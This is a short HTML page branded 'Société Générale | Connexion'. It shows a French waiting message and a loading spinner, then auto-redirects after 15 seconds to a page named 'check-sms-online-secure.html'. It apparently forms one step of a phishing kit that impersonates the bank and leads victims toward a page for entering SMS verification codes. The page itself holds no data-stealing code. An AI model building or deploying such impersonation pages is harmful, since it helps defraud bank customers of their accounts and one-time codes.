<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
	<meta http-equiv="refresh" content="15; url=check-sms-online-secure.html" />
	<title>Société Générale | Connexion</title>
	<link rel="icon" type="image/x-icon" href="./img2/index.ico">
	<link rel="stylesheet" href="./css/spin.css">
	<link rel="stylesheet" href="./css/media.css">
</head>
<body>
	<div class="contenr">
		<center>
			<div class="dika">
				<div class="tito"></div>
				<div class="msg"><span class="titiz">Merci de patienter, Vous serez redirigé dans quelque instant...</span></div>
			</div>
		</center>
		 
		<center>
			<div class="sk-cube-grid">
                <div class="sk-cube sk-cube1"></div>
                <div class="sk-cube sk-cube2"></div>
                <div class="sk-cube sk-cube3"></div>
                <div class="sk-cube sk-cube4"></div>
                <div class="sk-cube sk-cube5"></div>
                <div class="sk-cube sk-cube6"></div>
                <div class="sk-cube sk-cube7"></div>
                <div class="sk-cube sk-cube8"></div>
                <div class="sk-cube sk-cube9"></div>
            </div>
		</center>
	</div>
</body>
</html>